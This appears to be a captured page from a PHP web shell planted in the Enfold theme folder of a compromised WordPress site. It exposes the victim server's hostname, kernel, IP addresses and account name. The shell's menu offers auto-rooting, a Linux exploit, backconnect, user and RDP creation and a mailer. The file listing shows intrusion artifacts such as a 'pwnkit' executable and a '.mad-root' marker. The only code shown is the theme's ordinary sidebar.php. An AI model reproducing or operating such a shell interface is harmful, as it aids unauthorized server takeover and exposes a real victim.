Linux webm002.cluster121.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.121.20.2 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
5.4.45
urgencetin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
urgencetin /
www /
wp-content /
themes /
enfold /
[ HOME SHELL ]
Name
Size
Permission
Action
config-bbpress
[ DIR ]
drwxr-xr-x
config-events-calendar
[ DIR ]
drwxr-xr-x
config-gravityforms
[ DIR ]
drwxr-xr-x
config-layerslider
[ DIR ]
drwxr-xr-x
config-templatebuilder
[ DIR ]
drwxr-xr-x
config-woocommerce
[ DIR ]
drwxr-xr-x
config-wordpress-seo
[ DIR ]
drwxr-xr-x
config-wpml
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.php
72
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-more.php
181.05
KB
-rw-r--r--
archive.php
3.12
KB
-rw-r--r--
author.php
1.86
KB
-rw-r--r--
comments.php
4.98
KB
-rw-r--r--
conf.php
26.76
KB
-rw-r--r--
footer.php
6.18
KB
-rw-r--r--
forum.php
1.79
KB
-rw-r--r--
functions-enfold-interface.php
25.92
KB
-rw-r--r--
functions-enfold.php
57.34
KB
-rw-r--r--
functions.php
39.53
KB
-rw-r--r--
functions.php_bak
20.59
KB
-rw-r--r--
functions.txt
20.59
KB
-rw-r--r--
header.php
2.56
KB
-rw-r--r--
index-ajax-response.php
546
B
-rw-r--r--
index.php
2.58
KB
-rw-r--r--
page.php
1.36
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
144.35
KB
-rw-r--r--
search.php
2.12
KB
-rw-r--r--
searchform.php
1.27
KB
-rw-r--r--
sidebar.php
3.66
KB
-rw-r--r--
single-portfolio.php
1.4
KB
-rw-r--r--
single.php
2.02
KB
-rw-r--r--
style.css
1.16
KB
-rw-r--r--
tag-statement.php
546
B
-rw-r--r--
tag.php
5.98
KB
-rw-r--r--
taxonomy-portfolio_entries.php
1.78
KB
-rw-r--r--
template-archives.php
7.35
KB
-rw-r--r--
template-blank.php
647
B
-rw-r--r--
template-builder.php
2.83
KB
-rw-r--r--
wpml-config.xml
2.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar.php
<?php if ( !defined('ABSPATH') ){ die(); } global $avia_config; ############################################################################## # Display the sidebar ############################################################################## $default_sidebar = true; $sidebar_pos = avia_layout_class('main', false); $sidebar_smartphone = avia_get_option('smartphones_sidebar') == 'smartphones_sidebar' ? 'smartphones_sidebar_active' : ""; $sidebar = ""; if(strpos($sidebar_pos, 'sidebar_left') !== false) $sidebar = 'left'; if(strpos($sidebar_pos, 'sidebar_right') !== false) $sidebar = 'right'; //filter the sidebar position (eg woocommerce single product pages always want the same sidebar pos) $sidebar = apply_filters('avf_sidebar_position', $sidebar); //if the layout hasnt the sidebar keyword defined we dont need to display one if(empty($sidebar)) return; if(!empty($avia_config['overload_sidebar'])) $avia_config['currently_viewing'] = $avia_config['overload_sidebar']; echo "<aside class='sidebar sidebar_".$sidebar." ".$sidebar_smartphone." ".avia_layout_class( 'sidebar', false )." units' ".avia_markup_helper(array('context' => 'sidebar', 'echo' => false)).">"; echo "<div class='inner_sidebar extralight-border'>"; //Display a subnavigation for pages that is automatically generated, so the users do not need to work with widgets $av_sidebar_menu = avia_sidebar_menu(false); if($av_sidebar_menu) { echo $av_sidebar_menu; $default_sidebar = false; } $the_id = @get_the_ID(); $custom_sidebar = ""; if(!empty($the_id) && is_singular()) { $custom_sidebar = get_post_meta($the_id, 'sidebar', true); } $custom_sidebar = apply_filters('avf_custom_sidebar', $custom_sidebar); if($custom_sidebar) { dynamic_sidebar($custom_sidebar); $default_sidebar = false; } else { if(empty($avia_config['currently_viewing'])) $avia_config['currently_viewing'] = 'page'; // general shop sidebars if ($avia_config['currently_viewing'] == 'shop' && dynamic_sidebar('Shop Overview Page') ) : $default_sidebar = false; endif; // single shop sidebars if ($avia_config['currently_viewing'] == 'shop_single') $default_sidebar = false; if ($avia_config['currently_viewing'] == 'shop_single' && dynamic_sidebar('Single Product Pages') ) : $default_sidebar = false; endif; // general blog sidebars if ($avia_config['currently_viewing'] == 'blog' && dynamic_sidebar('Sidebar Blog') ) : $default_sidebar = false; endif; // general pages sidebars if ($avia_config['currently_viewing'] == 'page' && dynamic_sidebar('Sidebar Pages') ) : $default_sidebar = false; endif; // forum pages sidebars if ($avia_config['currently_viewing'] == 'forum' && dynamic_sidebar('Forum') ) : $default_sidebar = false; endif; } //global sidebar if (dynamic_sidebar('Displayed Everywhere')) : $default_sidebar = false; endif; //default dummy sidebar if (apply_filters('avf_show_default_sidebars', $default_sidebar)) { if(apply_filters('avf_show_default_sidebar_pages', true)) {avia_dummy_widget(2);} if(apply_filters('avf_show_default_sidebar_categories', true)) {avia_dummy_widget(3);} if(apply_filters('avf_show_default_sidebar_archiv', true)) {avia_dummy_widget(4);} // customize default sidebar and add your sidebars do_action ('ava_add_custom_default_sidebars'); } echo "</div>"; echo "</aside>";
Close